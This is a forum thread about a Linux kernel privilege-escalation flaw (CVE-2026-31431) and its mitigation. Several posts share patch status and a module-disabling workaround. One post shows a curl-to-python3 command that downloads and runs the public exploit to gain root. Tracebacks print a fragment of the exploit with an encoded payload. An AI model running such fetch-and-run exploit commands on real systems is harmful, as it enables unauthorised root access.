Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Register

Quick Links


Shells Virtual Desktop
BMail.ag - Secure Email Service
Server.net
CPLicense.net
VPS Server
Buy VPN
Vultr
VMs for AI
HostDare
HostDare
ReliableSite White-Label Dedicated Hosting for Resellers
InterServer VPS
BMail.ag - Secure Email Service
Best VPN
High-Performance Bare Metal Server Solutions
Karvl.com
Server Mania Cloud Hosting
DataWagon Hosting
AlphaVPS Hosting
Evoxt.com
Clouvider
VPS Hosting with NVMe
Residential IPs in the US & 4G Mobile Proxies in EU & US with Unlimited Bandwidth
ReliableSite White-Label Dedicated Hosting for Resellers
Rabisu - Hosting Solutions
Shells Virtual Desktop

Categories

In this Discussion

Home General
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Public exploit on most Linux distro’s - patching recommended

BackboneDirectBackboneDirect Member, Host Rep
edited May 23 in General

Hi LET,

We wanted to make you aware of https://copy.fail - its quite easy to get privileged access via such exploit.

Remedy is disabling the algif module like below; the site explains it more clearly.

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf

Thanked by 21oloke ayerfton Murv whynotlearn cxg JohnnySac slowservers nullnothere forest WyvernCo rnthosting meowwcc Porlam dsbnoob vicaya ariq01 mandala ChrisMiller buggedout JasonM host_c
«134

Comments

  • zedzed Member

    https://security-tracker.debian.org/tracker/CVE-2026-31431

    Thanked by 7oloke Murv slowservers nullnothere WyvernCo dev077 JasonM
  • davidedavide Member

    If it weren't as solid as a rock it would be flexing :D

    Thanked by 5Frameworks WyvernCo zejjnt host_c netomx
  • whynotlearnwhynotlearn Member

    Had uploaded the same article but you had beat me to it!

    Anyways, it feels like a really scary bug to have for 7 years in the linux kernel. This feels like a bug which a state nation might as well pay some crazy high millions for. Just absolutely wild.

    There are softwares which are having supply chain attacks so if you update to the latest version then you get compromised, and softwares where previous bugs can lead to RCE (Opencode had that issue for example for sometime) and now this issue too which converts any RCE into straight up root privilege issue which is a crazy escalation.

    This bug still works on fresh Ubuntu/Debian but is fixed on arch and cachy and others, lets hope that this bug is solved asap by default.

    I am a bit confused as to why Ubuntu set this bug as medium in their bug tracker when it should be high by their own standards/rules. Doesn't inspire confidence in Ubuntu that much but I personally already use debian so YMMV

    Thanked by 3oloke cxg WyvernCo
  • buzzyLETbuzzyLET Member

    there's not even a current patch for Ubuntu/Debian?? what am I supposed to do??

    Thanked by 1WyvernCo
  • olokeoloke Member, Host Rep

    @buzzyLET said:
    there's not even a current patch for Ubuntu/Debian?? what am I supposed to do??

    Most recent Debian version still vulnerable:

    Ubuntu also mostly not patched (except 26.04 apparently):
    https://ubuntu.com/security/CVE-2026-31431

    The temporary workaround was provided in the original post:

    echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf

    This will disable AEAD support in AF_ALG entirely, preventing the possibility of exploitation.

    Thanked by 1WyvernCo
  • whynotlearnwhynotlearn Member

    @buzzyLET said:
    there's not even a current patch for Ubuntu/Debian?? what am I supposed to do??

    I think doing this or something similar, echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf

    Thanked by 1buzzyLET
  • JordJord Moderator, Host Rep, Megathread Squad

    This is why we can't have nice things

  • sillycatsillycat Member

    I'm still running Ubuntu 20.04 LTS with 5.0 kernel. What does this mean for me?

    Thanked by 2oloke Nekopara
  • CloudHopperCloudHopper Member

    Fortunately it's only an LPE so an attacker would have to already have access to the server to be able to exploit it. It's a big problem for shared environments, but for private servers it's not that big a deal.

    Thanked by 10buzzyLET Tony40 ahnlak stable_genius n1ghtm4r3x dev077 borkedascii kkrajk mrTom abtdw
  • tuxtux Member

    @buzzyLET said:
    there's not even a current patch for Ubuntu/Debian?? what am I supposed to do??

    Kernel upgrade if it is fixed in newer kernel

  • zedzed Member

    @tux said:

    @buzzyLET said:
    there's not even a current patch for Ubuntu/Debian?? what am I supposed to do??

    Kernel upgrade if it is fixed in newer kernel

    good thing tux showed up!

  • BackboneDirectBackboneDirect Member, Host Rep

    More is coming soon as well:

    https://xint.io/blog/copy-fail-linux-distributions

    Thanked by 1jsg
  • emperoremperor Member
    edited April 29

    On Slackware 15.0 kernel 5.15.193 im getting this error

    Traceback (most recent call last):
  File "<stdin>", line 8, in <module>
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

    su is located in diff directory

  • totally_not_bannedtotally_not_banned Member
    edited April 29

    @emperor said:
    On Slackware 15.0 kernel 5.15.193 im getting this error

    Traceback (most recent call last):
  File "<stdin>", line 8, in <module>
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

    Seems it expects su to be in /usr/bin which going by the error messages it obviously isn't. Probably the result of this stupid directory merge nonsense a lot of mainstream distributions applied recently.

  • emperoremperor Member

    @totally_not_banned said:

    @emperor said:
    On Slackware 15.0 kernel 5.15.193 im getting this error

    Traceback (most recent call last):
  File "<stdin>", line 8, in <module>
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

    Seems it expects su to be in /usr/bin which going by the error messages it obviously isn't. Probably the result of this stupid directory merge nonsense a lot of mainstream distributions applied recently.

    Well, i did manage to edit with correct path, and now im getting this :

    Traceback (most recent call last):
  File "/home/user/exp.py", line 8, in <module>
    f=g.open("/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
PermissionError: [Errno 13] Permission denied: '/bin/su'
  • totally_not_bannedtotally_not_banned Member

    @emperor said:

    @totally_not_banned said:

    @emperor said:
    On Slackware 15.0 kernel 5.15.193 im getting this error

    Traceback (most recent call last):
  File "<stdin>", line 8, in <module>
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

    Seems it expects su to be in /usr/bin which going by the error messages it obviously isn't. Probably the result of this stupid directory merge nonsense a lot of mainstream distributions applied recently.

    Well, i did manage to edit with correct path, and now im getting this :

    Traceback (most recent call last):
  File "/home/user/exp.py", line 8, in <module>
    f=g.open("/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
PermissionError: [Errno 13] Permission denied: '/bin/su'

    No idea, sorry. Maybe slackware is just to cool to be owned by such silly little exploit? Well, maybe it expects read permission for world and slackware doesn't grant that by default but at that point i am plainly guessing.

    Thanked by 1emperor
  • MikeAMikeA Member, Patron Provider
    edited April 29

    I tried it on non-sudo users on some Rockylinux (4.X kernel) and it didn't work. But I updated and rebooted anyways.

  • buzzyLETbuzzyLET Member

    @MikeA said:
    I tried it on non-sudo users on some Rockylinux (4.X kernel) and it didn't work. But I updated and rebooted anyways.

    Is there a comprehensive list yet of which distros are affected or not?

  • raindog308raindog308 Administrator, Veteran

    @BackboneDirect said: https://copy.fail

    image

    Thanked by 7nghialele Alyx buggedout Murv Frameworks tentor khalequzzaman
  • slowserversslowservers Member, Host Rep

    IPv6 only servers are immune! Get yours today!

    monero@localhost:~$ curl https://copy.fail/exp
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
curl: (7) Failed to connect to copy.fail port 443 after 156 ms: Could not connect to server

    Oh, not so fast...

    monero@localhost:~$ curl -x 'socks5h://[2602:f5ef::1080]:1080' https://copy.fail/exp | python3 && su
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   4148      0 --:--:-- --:--:-- --:--:--  4153
# id                   
uid=0(root) gid=1000(monero) groups=1000(monero)

    Pretty scary. Debian still seems to be vulnerable on all stable versions: https://security-tracker.debian.org/tracker/CVE-2026-31431

    Thank you for sharing!

    Thanked by 4384_cz ralf dev077 itzgeo
  • nghialelenghialele Member

    Too scary I cancelled my vps.

    Thanked by 13farsighter Murv Frameworks WyvernCo ralf tux Rocco zGato ebietsy beanman109 dev077 borkedascii khalequzzaman
  • MikeAMikeA Member, Patron Provider

    @nghialele said:
    Too scary I cancelled my vps.

    Reguards

    Thanked by 6nghialele Murv Frameworks tux zGato beanman109
  • conceptconcept Member

    just turn off the internet on your vps.

    Thanked by 1tux
  • zedzed Member

    @buzzyLET said:

    @MikeA said:
    I tried it on non-sudo users on some Rockylinux (4.X kernel) and it didn't work. But I updated and rebooted anyways.

    Is there a comprehensive list yet of which distros are affected or not?

    "The same exploit binary works unmodified on every Linux distribution."

    Some have been patched, probably simplest to just check with your distro. At a mimimum debian & it's descendants seem unpatched as yet.

  • jon617jon617 Veteran
    edited April 30

    @CloudHopper said: Fortunately it's only an LPE so an attacker would have to already have access to the server to be able to exploit it. It's a big problem for shared environments, but for private servers it's not that big a deal.

    Just to clarify, yes, the attacker would need to have access to a server to use the exploit, by "access" it's basically any host that can run tenant's code. So not just ssh logins, but also any client's docker/kubernetes containers, CI runners, and serverless functions. So, any host that can run someone's code.

    Definitely scary that this affected almost every linux distro released between 2017 and March 2026.

    The other scary thing, it may be impossible to ever know if a system had been exploited. Because the exploit changes the page cache in RAM without touching any files on the disk, it would be nearly impossible to know since their activity in RAM disappears upon reboot. And the only way to know if an attacker installed a persistent backdoor would be lots of digging at system files and network logs for anything unusual (finding a needle in a haystack).

    So I would think all hosting providers and PaaS providers should patch and reboot immediately, then reinstall their OS's as soon as possible.

    Thanked by 1cxg
  • forestforest Member

    @totally_not_banned said: No idea, sorry. Maybe slackware is just to cool to be owned by such silly little exploit? Well, maybe it expects read permission for world and slackware doesn't grant that by default but at that point i am plainly guessing.

    It's just a PoC. There are multiple ways to exploit it even if the Python PoC doesn't work.

  • totally_not_bannedtotally_not_banned Member

    @forest said:

    @totally_not_banned said: No idea, sorry. Maybe slackware is just to cool to be owned by such silly little exploit? Well, maybe it expects read permission for world and slackware doesn't grant that by default but at that point i am plainly guessing.

    It's just a PoC. There are multiple ways to exploit it even if the Python PoC doesn't work.

    I was joking, dear little girl avatar friend.

    Thanked by 3forest Murv beanman109
  • CloudHopperCloudHopper Member

    @jon617 said:

    @CloudHopper said: Fortunately it's only an LPE so an attacker would have to already have access to the server to be able to exploit it. It's a big problem for shared environments, but for private servers it's not that big a deal.

    Just to clarify, yes, the attacker would need to have access to a server to use the exploit, by "access" it's basically any host that can run tenant's code. So not just ssh logins, but also any client's docker/kubernetes containers, CI runners, and serverless functions. So, any host that can run someone's code.

    Definitely scary that this affected almost every linux distro released between 2017 and March 2026.

    The other scary thing, it may be impossible to ever know if a system had been exploited. Because the exploit changes the page cache in RAM without touching any files on the disk, it would be nearly impossible to know since their activity in RAM disappears upon reboot. And the only way to know if an attacker installed a persistent backdoor would be lots of digging at system files and network logs for anything unusual (finding a needle in a haystack).

    So I would think all hosting providers and PaaS providers should patch and reboot immediately, then reinstall their OS's as soon as possible.

    Once an attacker has user level access they can escalate their privileges in various manners. What makes this LPE special is it's universal and easy to trigger because of the size of the payload, but LPEs in general aren't particularly valuable to exploit brokers because privilege escalation is usually easy due to user misconfigurations.

    For example, if you run docker containers and your compromised user is a member of the Docker group then that's an instant LPE because the attacker can use a docker container to perform privileged activities on the host that will give them sustained root access.

    Anyone running shared environments should be gravely concerned by this, but anyone running a private server should already be gravely concerned when an unauthorized entity gains unprivileged access to their environment, regardless of whether there's a fancy LPE floating around or not.

    Thanked by 2jon617 nikio
  • dbadudedbadude Member

    Not so smart to show how to do the exploit, many wannabe hackers will use it now.

  • tentortentor Member, Host Rep

    @dbadude said:
    Not so smart to show how to do the exploit, many wannabe hackers will use it now.

    Apparently, they do

    I am seeing almost 2x scanning sources of what's usually seen at this time of day

    Thanked by 1oloke
Sign In or Register to comment.